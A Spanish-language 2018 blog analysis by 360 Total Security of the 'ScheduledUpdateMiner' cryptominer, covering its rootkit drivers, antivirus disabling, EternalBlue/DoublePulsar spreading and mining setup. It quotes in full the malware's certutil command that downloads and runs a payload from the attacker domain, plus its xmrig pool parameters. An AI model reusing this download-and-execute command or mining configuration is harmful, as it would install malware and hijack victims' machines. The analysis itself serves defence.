CryptoMiner, ScheduledUpdateMiner, utiliza Rootkit para interrumpir el antivirus y evitar la detección

25/05/2018360TS
Más información sobre el 360 Total Security

Recientemente, 360 Security Center descubrió un nuevo CryptoMiner que infectó decenas de miles de ordenadores en 3 días. Este malware abusa de la herramienta de Microsoft “certutil.exe” como módulo de descarga y se esconde en las tareas del cronograma del sistema para iniciarse en el arranque. Aprovecha 3 controladores de rootkit para interrumpir el antivirus y ocultar sus procesos y archivos, lo que hace que la mayoría del software antivirus no pueda capturarlo. También incluye 2 kits de exploits del arma cibernética NSA para infectar otras máquinas. Lo hemos llamado “ScheduledUpdateMiner”.

Análisis

Según nuestra investigación, a la mayoría de las víctimas se les infecta al descargar herramientas como cracks de software y generadores de claves de fuentes no fiables.

Después de ejecutar, crea una tarea de programación del sistema. Los parámetros de la línea de comandos de esta tarea son:
“cmd.exe” /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/app/4/app.exe %UserProfile%\AppData\Local\Temp\csrss\scheduled.exe && %UserProfile%
\AppData\Local\Temp\csrss\scheduled.exe /31340

Cuando el sistema inicia la tarea, descarga y ejecuta archivos de malware adicionales. La aplicación maliciosa descargada inyecta el código descifrado, que está escrito en el idioma Go, dentro de su archivo en su proceso principal y reporta la información del ordenador infectado a su servidor.


El malware descargado se copia en “\windows\rss\csrss.exe”. Después de ejecutarlo, descarga tres controladores de rootkit, WinmonProcessMonitor.sys winmonfs.sys y winmon.sys, y prepara la máquina anfitriona para extraer monedas criptográficas.

WinmonProcessMonitor.sys interrumpe el software antivirus.
Lista de procesos orientados:


Interrumpir el proceso brutalmente:

winmonfs.sys oculta los archivos maliciosos al interceptar el archivo del sistema IO para bloquear el acceso a sus archivos maliciosos.

winmon.sys oculta los procesos de malware al eliminar los procesos maliciosos de ActiveProcessLinks, una estructura de datos utilizada para rastrear procesos en ejecución en la memoria del sistema.

Este CrypoMiner descarga archivos adicionales de http://dp.fastandcoolest.com/deps/3/deps.zip

Los archivos descomprimidos son:

Dos herramientas, DoublePulsar y EternalBlue, de NSA Cyber Weapon lanzadas por el grupo hacker “Shadowbroker” son aplicadas por este CryptoMiner para infectar a otras máquinas.

La aplicación de minería se descarga a una carpeta temporal “%userprofile%\appdata\local\temp\wup\wup.exe”(La aplicación se basa en el proyecto de código abierto “xmrig”)

Los parámetros de minería son:
-o stratum+tcp://np.wupdomain.com:30003
-u 49485bb9-4971-4608-bc7a-b5ca7c5ea9cb
-p x
-k –nicehash
-o stratum+tcp://wupdomain.com:80
-u 49485bb9-4971-4608-bc7a-b5ca7c5ea9cb
-p x
-k –nicehash
-o stratum+tcp://xmr.pool.minergate.com:45700
-u milena.smith@protonmail.com
-p x
-k –nicehash –api-port 3433 –api-access-token
49485bb9-4971-4608-bc7a-b5ca7c5ea9cb –donate-level=1 –background

Memoro

Hace poco, hemos descubierto que se está extendiendo mucho el malware de CryptoMiner. Recomendamos encarecidamente a los usuarios que habiliten el software antivirus al instalar nuevas aplicaciones. También recomendamos que los usuarios realicen un escaneo de antivirus con 360 Total Security para que eviten ser víctimas de CryptoMiner.

Descargar 360 Total Security: https://www.360totalsecurity.com

Más información sobre el 360 Total Security